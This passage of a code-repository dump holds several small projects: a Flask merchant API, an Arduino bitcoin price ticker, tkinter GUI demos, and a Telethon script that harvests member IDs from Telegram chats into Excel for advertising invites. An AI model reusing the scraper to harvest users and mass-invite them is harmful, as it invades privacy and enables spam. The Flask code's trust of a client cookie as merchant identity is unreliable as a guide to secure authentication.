"repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "from flask import request\nfrom werkzeug.security import generate_password_hash\nfrom views import app\nfrom model.merchant import m_register, add_commodity, de_commodity, check_commodity\nfrom model.merchant import modify_commodity, modify_merchant\n\n\[email protected]('/api/merchant/registration', methods=['post'])\ndef m_registration():\n data = request.get_json()\n id = data['id']\n pwd = data['password']\n password = generate_password_hash(pwd)\n email = data['email']\n addr = data['addr']\n return m_register(id, password, email, addr)\n\n\[email protected]('/api/merchant/commodity', methods=['GET', 'POST'])\ndef commodity():\n react = request.args.get('react')\n if react == 'add':\n data = request.get_json()\n id = data['id']\n price = data['price']\n clss = data['clss']\n photo = data['photo'] # 图片传过来的是后是按照一个像素一个像素传过来的\n commodity_rest = data['commodity_rest']\n merchant_id = request.cookies.get(\"id\")\n return add_commodity(id, price, clss, photo, commodity_rest,\n merchant_id)\n elif react == 'delete':\n data = request.get_json()\n merchant_id = request.cookies.get(\"id\")\n id = data['id'] # 删除商品只用传过来商品id即可\n return de_commodity(id, merchant_id)\n elif react == 'check':\n merchant_id = request.cookies.get(\"id\")\n return check_commodity(merchant_id)\n\n\[email protected]('/api/merchant/modification', methods=['post'])\ndef modification():\n ob = request.args.get('ob')\n data = request.get_json()\n if ob == 'merchant':\n id = data['id']\n pwd = data['password']\n password = generate_password_hash(pwd)\n email = data['email']\n addr = data['addr']\n return modify_merchant(id, password, email, addr)\n elif ob == 'commodity':\n id = data['id']\n price = data['price']\n clss = data['clss']\n photo = data['photo'] # 图片传过来的是后是按照一个像素一个像素传过来的\n commodity_rest = data['commodity_rest']\n merchant_id = request.cookies.get(\"id\")\n return modify_commodity(id, price, clss, photo, commodity_rest,\n merchant_id)\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 19.5, "blob_id": "5731fd451303e3ff50e3ca88166f45a5c65429b2", "content_id": "6a09d968e73fa5b5e1a691c460ac47bde8cc6180", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42, "license_type": "no_license", "max_line_length": 24, "num_lines": 2, "path": "/yixiaoer/server/src/app.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3.6\n# coding: utf-8\n\n" }, { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 17.83333396911621, "blob_id": "3bfc9f74c38de508d1c508e3136853c3f0b2c0bc", "content_id": "8c5ee4c31a526f0fd547f585243c149f9b722b3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 112, "license_type": "no_license", "max_line_length": 40, "num_lines": 6, "path": "/Old-Li883/mall/util/response.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "import json\n\n\ndef response(code, data=None):\n res = {'status': code, 'data': data}\n return json.dumps(res)" } ]
114
Lbatson/arduino-bitcoin-ticker
https://github.com/Lbatson/arduino-bitcoin-ticker
386db42bff55ca0a7feda37171c7a4b56dfef589
9aa461c7d4216c2f0063ddc4949c992e28fce94a
2be05dcfdd8c93c012738c57a27456eab145fc7f
refs/heads/master
2016-09-06T09:29:03.450869
2014-01-07T23:10:03
2014-01-07T23:10:03
15,719,347
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5815047025680542, "alphanum_fraction": 0.6144200563430786, "avg_line_length": 19.612903594970703, "blob_id": "cb440c1d5b7604321f15da19b1918128af178619", "content_id": "291f32bd3589d1c9e108a4ff0a2d697e8cdb3c1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 638, "license_type": "no_license", "max_line_length": 42, "num_lines": 31, "path": "/serialdisplay.ino", "repo_name": "Lbatson/arduino-bitcoin-ticker", "src_encoding": "UTF-8", "text": "// bitcoin_display.ino\n#include <LiquidCrystal.h>\n\n// Initialze lcd display\nLiquidCrystal lcd(12, 11, 5, 4, 3, 2);\n\nvoid setup() {\n // Open serial port and start lcd screen\n Serial.begin(9600);\n lcd.begin(16, 2);\n}\n\nvoid loop() {\n // Check for serial data input\n if (Serial.available()) {\n // Set serial data to vars\n float buy = Serial.parseFloat();\n char end = Serial.read();\n float sell = Serial.parseFloat();\n\n // Display data to lcd\n lcd.clear();\n lcd.print(buy);\n lcd.setCursor(7,0);\n lcd.print(\"Buy\");\n lcd.setCursor(0,1);\n lcd.print(sell);\n lcd.setCursor(7,1);\n lcd.print(\"Sell\");\n }\n}" }, { "alpha_fraction": 0.595588207244873, "alphanum_fraction": 0.625, "avg_line_length": 23.058822631835938, "blob_id": "1c844ff1c7655ac33b72453a884640af851534b3", "content_id": "6191232c14b4bfe094c98f758ed6f53f8e85532e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 408, "license_type": "no_license", "max_line_length": 76, "num_lines": 17, "path": "/bitcoin_ticker.py", "repo_name": "Lbatson/arduino-bitcoin-ticker", "src_encoding": "UTF-8", "text": "import requests\nimport serial\nimport time\n\nser = serial.Serial('/dev/tty.usbmodemfd1331', baudrate=9600)\ntime.sleep(2)\n\nif ser.isOpen():\n while (True):\n r = requests.get('http://data.mtgox.com/api/2/BTCUSD/money/ticker_fast')\n r = r.json()\n buy = r['data']['buy']['value']\n sell = r['data']['sell']['value']\n ser.write(str(buy))\n ser.write('\\n')\n ser.write(str(sell))\n time.sleep(25)" }, { "alpha_fraction": 0.6907894611358643, "alphanum_fraction": 0.6907894611358643, "avg_line_length": 37, "blob_id": "dcc2dece2d371021ccfdaa3959e50ba87d07f616", "content_id": "383c42a4413170c1c143215b54a49648a21fe113", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 152, "license_type": "no_license", "max_line_length": 104, "num_lines": 4, "path": "/README.md", "repo_name": "Lbatson/arduino-bitcoin-ticker", "src_encoding": "UTF-8", "text": "arduino-bitcoin-ticker\n======================\n\nsimple setup that requests data from Mt.Gox api and sends data via usb serial to Arudino for LCD display\n" }, { "alpha_fraction": 0.5111111402511597, "alphanum_fraction": 0.6888889074325562, "avg_line_length": 14, "blob_id": "6e767a59c9665c70bb223d9301205ff5d5fd0daa", "content_id": "42abfbc93e78a95839e881ab83e5fc78348dc2cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 45, "license_type": "no_license", "max_line_length": 15, "num_lines": 3, "path": "/requirements.txt", "repo_name": "Lbatson/arduino-bitcoin-ticker", "src_encoding": "UTF-8", "text": "pyserial==2.7\nrequests==2.1.0\nwsgiref==0.1.2\n" } ]
4
Max0nyM/TelegramAd
https://github.com/Max0nyM/TelegramAd
cbeb369ac6b8a24e4a541878875d534d90f90c0c
36e559689c1968ecb3ab8baa93d158edebe6f942
4d222def3c65bddcd658f80cd75155a6df713670
refs/heads/master
2020-03-20T19:46:22.445131
2018-04-10T16:21:28
2018-04-10T16:21:28
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7665198445320129, "alphanum_fraction": 0.7698237895965576, "avg_line_length": 30.35714340209961, "blob_id": "bfe2d476e9b47f14b5942c9be18a4da390eee1d6", "content_id": "6418b1625caad1bd21e92e7982373b3f5ebc576e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 908, "license_type": "no_license", "max_line_length": 113, "num_lines": 28, "path": "/inviteToChannel.py", "repo_name": "Max0nyM/TelegramAd", "src_encoding": "UTF-8", "text": "from telethon.tl.functions.channels import InviteToChannelRequest\r\nfrom telethon.tl.functions.contacts import ResolveUsernameRequest\r\nfrom telethon.errors.rpc_error_list import UsernameInvalidError, UsernameNotOccupiedError, ChatAdminRequiredError\r\nfrom telethon.tl.types import InputChannel, InputUser\r\n\r\n\r\n\r\ndef inviteToChannel(client, channel, id_list):\r\n\t#Checking for not existing \r\n\ttry:\r\n\t\tresolve = client(ResolveUsernameRequest(channel))\r\n\texcept UsernameInvalidError:\r\n\t\tprint(\"Incorrect name of channel! Try again.\")\r\n\t\treturn False\r\n\texcept UsernameNotOccupiedError:\r\n\t\tprint(\"Incorrect name of channel! Try again.\")\r\n\t\treturn False\r\n\r\n\tchat_id = resolve.chats[0].id\r\n\taccess_hash = resolve.chats[0].access_hash\r\n\r\n\tinput_channel = InputChannel(chat_id, access_hash)\r\n\t\r\n\tfor id in id_list:\r\n\t\tinput_user = InputUser(id, 0)\r\n\t\tInviteToChannelRequest(input_channel, input_user)\r\n\r\n\treturn True\r\n\r\n" }, { "alpha_fraction": 0.745394766330719, "alphanum_fraction": 0.75, "avg_line_length": 27.129629135131836, "blob_id": "80222ece8e8970b0d18b3e273dc6d36cf72db90f", "content_id": "942dc4b0361b85ff01089165bf93f0d7b42a64a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1520, "license_type": "no_license", "max_line_length": 113, "num_lines": 54, "path": "/getId.py", "repo_name": "Max0nyM/TelegramAd", "src_encoding": "UTF-8", "text": "from telethon.tl.types import InputChannel\nfrom telethon.tl.functions.contacts import ResolveUsernameRequest\nfrom telethon.tl.functions.channels import GetParticipantsRequest\nfrom telethon.tl.types import ChannelParticipantsSearch\nfrom telethon.errors.rpc_error_list import UsernameInvalidError, UsernameNotOccupiedError, ChatAdminRequiredError\n\ndef getId(client, chatName, limit, debug=False):\n\t#Checking for not existing \n\ttry:\n\t\tresolve = client(ResolveUsernameRequest(chatName))\n\texcept UsernameInvalidError:\n\t\tprint(\"Incorrect name of chat! Try again.\")\n\t\treturn False\n\texcept UsernameNotOccupiedError:\n\t\tprint(\"Incorrect name of chat! Try again.\")\n\t\treturn False\n\n\t#Checking for chat or no\n\ttry:\n\t\taccess_hash = resolve.chats[0].access_hash\n\t\tchat_id = resolve.chats[0].id\n\texcept IndexError:\n\t\tprint(\"It's not a chat!\")\n\t\treturn False\n\n\tinput_channel = InputChannel(chat_id, access_hash)\n\tfilter = ChannelParticipantsSearch('')\n\toffset = 0\n\thash = 0\n\tallId = []\n\n\t#Checking for channel/private chat\n\ttry:\n\t\tclient(GetParticipantsRequest(input_channel, filter, offset, limit, hash))\n\texcept ChatAdminRequiredError:\n\t\tprint('It is channel/private chat!')\n\t\treturn False\n\n\tcount = 0\n\twhile True:\n\t\tif count == limit:\n\t\t\tbreak\n\t\tpart = client(\n\t\t\tGetParticipantsRequest(input_channel, filter, offset, limit, hash), \n\t\t\t)\n\t\tif not part.users:\n\t\t\tbreak\n\t\tallId.append(part.users[count].id)\n\t\tcount+=1\n\t\toffset+=1\n\t\tprint('{}/{}'.format(count, limit), end='\\r')\n\t\tif debug:\n\t\t\tprint(part.users[count].id)\n\treturn allId\n\n" }, { "alpha_fraction": 0.6853932738304138, "alphanum_fraction": 0.6891385912895203, "avg_line_length": 16.866666793823242, "blob_id": "3ac996dc1dd320d8eb6b2c224e34917b6c1b39fc", "content_id": "822a625421b5084a19f0feefb742c4a26c17b364", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 267, "license_type": "no_license", "max_line_length": 57, "num_lines": 15, "path": "/writeToExcel.py", "repo_name": "Max0nyM/TelegramAd", "src_encoding": "UTF-8", "text": "import xlwt\n\ndef writeToExcel(id_list, fileName, sheetName=\"UsersID\"):\n\t#Init workbook \n\twb = xlwt.Workbook()\n\n\t#Add sheet\n\tws = wb.add_sheet(sheetName)\n\n\t#Write to sheet\n\tfor i in range(len(id_list)):\n\t\tws.write(i, 0, id_list[i])\n\n\t#Saving in file\n\twb.save(fileName)" }, { "alpha_fraction": 0.707135796546936, "alphanum_fraction": 0.707135796546936, "avg_line_length": 24.884614944458008, "blob_id": "c8fb02f790ac7e4405cabdd6e32e850885c17407", "content_id": "13d0ee1835f6784421d463679f7a36c651462a0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2018, "license_type": "no_license", "max_line_length": 82, "num_lines": 78, "path": "/init.py", "repo_name": "Max0nyM/TelegramAd", "src_encoding": "UTF-8", "text": "from telethon import TelegramClient\nfrom configparser import ConfigParser\nimport os #For clear terminal\n\n\ndef initClient(configName='config.ini'):\n\t#Checkin if not inited\n\tif not os.path.exists(configName):\n\t\tprint(\"Config file doesn't exist!\")\n\t\treturn\n\n\t#Init config to read\n\tconfig = ConfigParser()\n\tconfig.read(configName)\n\n\t#Get basic information\n\tapi_id = config.get(\"TelegramAPI\", \"api_id\")\n\tapi_hash = config.get(\"TelegramAPI\", \"api_hash\")\n\tphone = config.get(\"Telegram\", \"phone\")\n\tusername = config.get(\"Telegram\", \"username\")\n\n\t#Init client\n\tclient = TelegramClient(username, api_id, api_hash)\n\tclient.connect()\n\n\t#If not .session file\n\tif not client.is_user_authorized():\n\t\tclient.send_code_request(phone)\n\t\ttry:\n\t\t\tclient.sign_in(phone, input('Enter the code which you had in your telegram: '))\n\t\texcept:\n\t\t\tclient.sign_in(password=input('Enter password: '))\n\n\treturn client\n\ndef initConfig(configName=\"config.ini\"):\n\t#Init configParser\n\tconfig = ConfigParser()\n\tconfig.read(configName)\n\n\t#If has inited\n\tif os.path.exists(configName):\n\t\t#Code below maybe deleted, because if file not exist it not inited\n\t\tisInit = config.get(\"Init\", \"isInit\")\n\t\tif isInit == \"true\":\n\t\t\treturn\n\n\t#Adding sections\n\tconfig.add_section(\"Init\") #is init\n\tconfig.add_section(\"TelegramAPI\") #api_id and api_hash\n\tconfig.add_section(\"Telegram\") #username and phone\n\n\t#Printing welcom\n\tprint(\"**INIT DATA**\")\n\n\t#Input data\n\tapi_id = str(input(\"Enter your api_id: \"))\n\tapi_hash = str(input(\"Enter your api_hash: \"))\n\tphone = str(input(\"Enter your phone: \"))\n\tusername = str(input(\"Enter your username (eg: @David_Cherednik): \"))\n\n\t#Setting config\n\tconfig.set(\"Init\", \"isInit\", \"true\")\n\n\tconfig.set(\"TelegramAPI\", \"api_id\", api_id)\n\tconfig.set(\"TelegramAPI\", \"api_hash\", api_hash)\n\n\tconfig.set(\"Telegram\", \"phone\", phone)\n\tconfig.set(\"Telegram\", \"username\", username)\n\n\t#Writing to config\n\twith open(configName, 'w') as file:\n\t\tconfig.write(file)\n\n\t#Printing successfull\n\tos.system(\"cls\")\n\tprint(\"**SUCCESSFULL**\")\n\tos.system(\"cls\")" }, { "alpha_fraction": 0.7364621162414551, "alphanum_fraction": 0.7364621162414551, "avg_line_length": 33.75, "blob_id": "72665d531f26cfbb6795c34e965102444861360d", "content_id": "5fd60ab6fe0735a8dc188a5aff928ef280e2c016", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 81, "num_lines": 8, "path": "/help.py", "repo_name": "Max0nyM/TelegramAd", "src_encoding": "UTF-8", "text": "def welcom():\n\twelcomText = \"\"\"\n\tTo stop the process press Ctrl+C\\n\n\tIf you have any questions write on [email protected]\\n\n\tIt script can extract only CHAT's members, not channel\\n\n\tIf you stoped script when it getting ids, you should do the instruction in app\\n\n\t\"\"\"\n\tprint(welcomText)" }, { "alpha_fraction": 0.6986211538314819, "alphanum_fraction": 0.70124751329422, "avg_line_length": 27.679244995117188, "blob_id": "639ad2665be39aa4be3bc0f4b13b43580003c7da", "content_id": "2ee43e4a76fff194e3d54468c98834a8fa461e90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1523, "license_type": "no_license", "max_line_length": 180, "num_lines": 53, "path": "/main.py", "repo_name": "Max0nyM/TelegramAd", "src_encoding": "UTF-8", "text": "from getId import getId\nfrom writeToExcel import writeToExcel\n#from inviteToChannel import inviteToChannel\nfrom help import welcom\nimport init\n\nfrom sqlite3 import OperationalError\n\ndef main():\n\twelcom()\n\n\t#Initialization\n\tinit.initConfig()\n\ttry:\n\t\tclient = init.initClient()\n\texcept OperationalError:\n\t\tprint(\"Database is locked. It maybe you close app when it parse ids.\\nWait, and if it no work, delete config.ini,\\n@<your username>.session and @<your username>.session-journal\")\n\t\treturn\n\n\t#Get info\n\tname = str(input(\"Enter name of Telegram channel (eg: @howdyho, but without @ - howdyho): \"))\n\tlimit = int(input(\"Enter limit of parse user (take into account - 1 member = 1/4 of second): \"))\n\n\twhile True:\n\t\tid = getId(client, name, limit)\n\t\tif not id:\n\t\t\tname = str(input(\"Enter name of Telegram channel (eg: @howdyho, but without @ - howdyho): \"))\n\t\t\tid = getId(client, name, limit)\n\t\telse:\n\t\t\tbreak\n\n\t\"\"\"channelInvite = str(input(\"Enter name of Telegram channel (eg: @savemdk, but without @ - savemdk) to invite users in it: \"))\n\n\twhile True:\n\t\tinviting = inviteToChannel(client, channelInvite, id)\n\t\tif not inviting:\n\t\t\tchannelInvite = str(input(\"Enter name of Telegram channel (eg: @savemdk, but without @ - savemdk) to invite users in it: \"))\n\t\t\tinviting = inviteToChannel(client, channelInvite, id)\n\t\telse:\n\t\t\tbreak\n\n\tfileName = str(input(\"Enter name of excel file: \"))\"\"\"\n\twriteToExcel(id, fileName)\n\t\n\n\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tprint(\"\\nStoping...\")\n\t\texit()\n\n\n\n" } ]
6
barskern/hdrie
https://github.com/barskern/hdrie
653d84a77f561fb0272221a858ce90ba559f1def
d4ff19f03b9e631094525643ddfc2a54ff622594
947bd97888bf4c75a32a27d496c134e7e1e5868c
refs/heads/master
2020-05-01T12:16:25.415354
2019-03-30T17:47:37
2019-03-30T17:47:37
177,461,998
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6157894730567932, "alphanum_fraction": 0.621052622795105, "avg_line_length": 21.799999237060547, "blob_id": "fae809a1e389a9e4c4995df937263a11e931e8e9", "content_id": "c841749e1d736983e3bec6b506fc8a98dfd245a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 570, "license_type": "permissive", "max_line_length": 82, "num_lines": 25, "path": "/setup.py", "repo_name": "barskern/hdrie", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE.md') as f:\n license = f.read()\n\nsetup(\n name='hdrie',\n version='0.0.1',\n description='Transform images to HDR and render them with several techniques',\n long_description=readme,\n author='Ole Martin Ruud',\n author_email='[email protected]',\n setup_requires=[\n 'pytest-runner',\n ],\n tests_require=[\n 'pytest',\n ],\n url='https://github.com/barskern/hdrie',\n license=license,\n packages=find_packages(exclude=('tests'))\n)\n" }, { "alpha_fraction": 0.578125, "alphanum_fraction": 0.625, "avg_line_length": 15, "blob_id": "8a06ef9652a388d36f9768b8520b5fa2e3b51a42", "content_id": "485c6b687643e123e3ad7473dfe614834f21fc9c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 64, "license_type": "permissive", "max_line_length": 32, "num_lines": 4, "path": "/tests/hdrie_test.py", "repo_name": "barskern/hdrie", "src_encoding": "UTF-8", "text": "import hdrie\n\ndef test_plus():\n assert hdrie.plus(2, 3) == 5\n" }, { "alpha_fraction": 0.7643678188323975, "alphanum_fraction": 0.7643678188323975, "avg_line_length": 57, "blob_id": "e1900bbae3dfab7ab1349cd8095f28eba588ba04", "content_id": "70d4430131e24d12d0f4350dc3bcbdcd9d696bed", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 348, "license_type": "permissive", "max_line_length": 135, "num_lines": 6, "path": "/README.md", "repo_name": "barskern/hdrie", "src_encoding": "UTF-8", "text": "# HDRIE\n\n[![Build Status](https://travis-ci.com/barskern/hdrie.svg?token=S3nA1j4MQ8fzYt5KzyxX&branch=master)](https://travis-ci.com/barskern/hdrie)\n[![codecov](https://codecov.io/gh/barskern/hdrie/branch/master/graph/badge.svg?token=kYGkwROnqu)](https://codecov.io/gh/barskern/hdrie)\n\nA library to transform images to HDR and render them with several techniques.\n" }, { "alpha_fraction": 0.5222222208976746, "alphanum_fraction": 0.5222222208976746, "avg_line_length": 17, "blob_id": "2b00648743d8beaaeeb855c037eee3f2e2720412", "content_id": "cf586f8c865f7132272de6a0059018b9529a7141", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 90, "license_type": "permissive", "max_line_length": 40, "num_lines": 5, "path": "/hdrie/__init__.py", "repo_name": "barskern/hdrie", "src_encoding": "UTF-8", "text": "def plus(x, y):\n \"\"\"\n Adds two numbers and returns the sum\n \"\"\"\n return x + y\n" } ]
4
emailman/tkinter_demos
https://github.com/emailman/tkinter_demos
0b2338a0e6d7d5c8b38c9f6d8ff433d1761cfd55
f08263da7e6be5891dbd1bdafa186ffe353fc066
00b404a6bd37149abf663b0db3eb2430c74cd19c
refs/heads/master
2021-01-25T07:40:40.971727
2017-06-07T15:22:22
2017-06-07T15:22:22
93,650,093
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5411408543586731, "alphanum_fraction": 0.5643614530563354, "avg_line_length": 34.375, "blob_id": "9855ae5d3f717352aba88c39d0054c64cfbfd235", "content_id": "dc5f6c2eca651e2d8a4beea90fee3e7a48572466", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1981, "license_type": "no_license", "max_line_length": 73, "num_lines": 56, "path": "/tkinter demo 6.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\nfrom tkinter import messagebox\nfrom math import pi\n\n# A form to calculate the area of a circle given the radius\n\n\nclass Form1:\n def __init__(self):\n\n window = Tk()\n window.title(\"Tkinter Demo 6\")\n window.geometry(\"300x200\")\n\n # Create the fields\n Label(window, text=\"Enter the radius: \", font=(\"Arial\", 14),\n foreground=\"Blue\").grid(row=1, column=1, padx=5, pady=10)\n\n # Declare a DoubleVar and textvariable to read the user entry\n # from an Entry field as a decimal value\n self.radius = DoubleVar()\n Entry(window, font=(\"Arial\", 14), foreground=\"Blue\", width=10,\n textvariable=self.radius).grid(row=1, column=2, pady=10)\n\n btn_calculate_area =\\\n Button(window, text=\"Calculate Area\", font=(\"Arial\", 14),\n foreground=\"Green\", command=self.process_click)\n btn_calculate_area.grid(row=2, column=1, columnspan=2, pady=10)\n\n Label(window, text=\"Area =\", font=(\"Arial\", 14),\n foreground=\"Blue\").grid(row=3, column=1, pady=10, sticky=E)\n\n self.lbl_area = Label(window, text=\"\", font=(\"Arial\", 14),\n foreground=\"Blue\")\n self.lbl_area.grid(row=3, column=2, pady=10, sticky=W)\n\n window.mainloop()\n\n # Handle the button click\n def process_click(self):\n # Try to calculate the area of a circle given the radius\n try:\n if self.radius.get() >= 0:\n area = pi * self.radius.get() ** 2\n area_formatted = \"{:.2f}\".format(area)\n self.lbl_area.config(text=area_formatted)\n else:\n messagebox.showerror(\"My Area Calculator\",\n \"Negative radius is not allowed\")\n except TclError:\n messagebox.showerror(\"My Area Calculator\",\n \"Missing or non-numeric entry\")\n\n\n# Create a GUI object\nForm1()\n" }, { "alpha_fraction": 0.6633663177490234, "alphanum_fraction": 0.6782178282737732, "avg_line_length": 17.9375, "blob_id": "89932d2cbb803ce3f7edd39ec429cbd4f7559c92", "content_id": "665a4ca609a264e9f4fc4d65a4629ffa68f756cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 606, "license_type": "no_license", "max_line_length": 67, "num_lines": 32, "path": "/tkinter demo 3.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\n\n# Respond to a button click by changing the text in a label\n\n# These need to defined globally\n\nwindow = Tk()\nlabel = Label()\n\n\ndef process_click():\n # Change the label in response to the button click\n label.config(text=\"Thanks for clicking\")\n\n\ndef demo3():\n\n # Set the window title and size\n\n window.title(\"Tkinter Demo 3\")\n window.geometry(\"200x100\")\n\n global label\n label = Label(window, text=\"This Is Getting Interesting\")\n button = Button(window, text=\"Click Me\", command=process_click)\n\n label.pack()\n button.pack()\n\n window.mainloop()\n\ndemo3()\n" }, { "alpha_fraction": 0.5536723136901855, "alphanum_fraction": 0.5870056748390198, "avg_line_length": 34.400001525878906, "blob_id": "7457cd66fb0a3dd15bad2fdbcb9c8439d4e5064a", "content_id": "af4537b6b1e08a940b2aa50374f97d78f6eb9dc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1770, "license_type": "no_license", "max_line_length": 118, "num_lines": 50, "path": "/tkinter demo 8.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\n\n# Use three sliders to create a color mixer\n\n\nclass ColorMixer:\n def __init__(self):\n window = Tk()\n window.title(\"Color Mixer\")\n\n self.sldr_red = Scale(window, to=\"255\", orient=HORIZONTAL, troughcolor=\"RED\", fg=\"RED\",\n length=175, command=self.slider_moved)\n self.sldr_red.grid(row=1, column=1)\n\n self.sldr_green = Scale(window, to=\"255\", orient=HORIZONTAL, troughcolor=\"GREEN\", fg=\"GREEN\",\n length=175, command=self.slider_moved)\n self.sldr_green.grid(row=2, column=1)\n\n self.sldr_blue = Scale(window, to=\"255\", orient=HORIZONTAL, troughcolor=\"BLUE\", fg=\"BLUE\",\n length=175, command=self.slider_moved)\n self.sldr_blue.grid(row=3, column=1)\n\n # Create a canvas on which to draw a circle\n self.canvas = Canvas(window, width=200, height=200, bg=\"grey\")\n self.canvas.grid(row=4, column=1, padx=10, pady=10) # Important: this must not be included in the line above!\n\n # Create a circle on the canvas: corner = (50, 50), diameter = 150\n self.circle = self.canvas.create_oval(50, 50, 150, 150)\n\n window.mainloop()\n\n def slider_moved(self, value):\n red = format(self.sldr_red.get(), '02x')\n print(\"red =\", red)\n\n green = format(self.sldr_green.get(), '02x')\n print(\"green =\", green)\n\n blue = format(self.sldr_blue.get(), '02x')\n print(\"blue =\", blue)\n\n # Convert the three hex values to a valid hex string\n mix = \"#\" + red + green + blue\n print(\"mix =\", mix)\n\n # Configure the fill property of the circle on the canvas\n self.canvas.itemconfig(self.circle, fill=mix)\n\n\nColorMixer()\n" }, { "alpha_fraction": 0.5716791749000549, "alphanum_fraction": 0.5889724493026733, "avg_line_length": 31.97520637512207, "blob_id": "e0a8b005f271e9894ca97e04d3737692dfc9c1ff", "content_id": "b46b87b88809e7f5f0c51149be1114c1ca5005a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3990, "license_type": "no_license", "max_line_length": 119, "num_lines": 121, "path": "/tkinter demo 7.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\n\n# Use radio buttons and check buttons to build an ordering menu\n\n\nclass OrderUp:\n\n def __init__(self):\n window = Tk()\n window.title(\"Welcome to Jimmy John's\")\n\n Label(text=\"Order Menu\").grid(row=0, column=1, columnspan=3)\n\n Label(text=\"Choose Your Meat \").grid(row=1, column=1)\n\n self.meat = IntVar() # variable for all meat choices\n\n rbtn_ham = Radiobutton(window, text=\"ham\", variable=self.meat, command=self.choose_meat, value=1)\n rbtn_ham.grid(row=2, column=1, sticky=W)\n\n rbtn_turkey = Radiobutton(window, text=\"turkey\", variable=self.meat, command=self.choose_meat, value=2)\n rbtn_turkey.grid(row=3, column=1, sticky=W)\n\n rbtn_roast_beef = Radiobutton(window, text=\"roast beef\", variable=self.meat, command=self.choose_meat, value=3)\n rbtn_roast_beef.grid(row=4, column=1, sticky=W)\n\n Label(text=\"Choose Your Bread \").grid(row=1, column=2)\n\n self.bread = IntVar() # variable for all bread choices\n\n rbtn_ham = Radiobutton(window, text=\"white\", variable=self.bread, command=self.choose_bread, value=1)\n rbtn_ham.grid(row=2, column=2, sticky=W)\n\n rbtn_turkey = Radiobutton(window, text=\"wheat\", variable=self.bread, command=self.choose_bread, value=2)\n rbtn_turkey.grid(row=3, column=2, sticky=W)\n\n rbtn_roast_beef = Radiobutton(window, text=\"rye\", variable=self.bread, command=self.choose_bread, value=3)\n rbtn_roast_beef.grid(row=4, column=2, sticky=W)\n\n Label(text=\"Choose Your Condiments \").grid(row=1, column=3)\n\n self.mayo = IntVar()\n cbtn_mayo = Checkbutton(window, text=\"mayo\", variable=self.mayo, command=self.choose_mayo)\n cbtn_mayo.grid(row=2, column=3, sticky=W)\n\n self.ketchup = IntVar()\n cbtn_ketchup = Checkbutton(window, text=\"ketchup\", variable=self.ketchup, command=self.choose_ketchup)\n cbtn_ketchup.grid(row=3, column=3, sticky=W)\n\n self.mustard = IntVar()\n cbtn_mustard = Checkbutton(window, text=\"mustard\", variable=self.mustard, command=self.choose_mustard)\n cbtn_mustard.grid(row=4, column=3, sticky=W)\n\n btn_order = Button(window, text=\"ORDER\", command=self.place_order)\n btn_order.grid(row=5, column=1, columnspan=3)\n\n self.show_order = StringVar()\n self.lblOrder = Label(window, textvariable=self.show_order)\n self.lblOrder.grid(row=6, column=1, columnspan=3)\n self.show_order.set(\"Your order will appear here\")\n\n window.mainloop()\n\n def choose_meat(self):\n print(\"meat =\", self.meat.get())\n\n def choose_bread(self):\n print(\"bread =\", self.bread.get())\n\n def choose_mayo(self):\n print(\"mayo =\", self.mayo.get())\n\n def choose_ketchup(self):\n print(\"ketchup =\", self.ketchup.get())\n\n def choose_mustard(self):\n print(\"mustard =\", self.mustard.get())\n\n def place_order(self):\n\n if self.meat.get() == 1:\n choice1 = \"ham\"\n elif self.meat.get() == 2:\n choice1 = \"turkey\"\n elif self.meat.get() == 3:\n choice1 = \"roast beef\"\n else:\n choice1 = \"no meat chosen\"\n print(\"meat =\", choice1)\n\n if self.bread.get() == 1:\n choice2 = \"white\"\n elif self.bread.get() == 2:\n choice2 = \"wheat\"\n elif self.bread.get() == 3:\n choice2 = \"rye\"\n else:\n choice2 = \"no bread chosen\"\n print(\"bread =\", 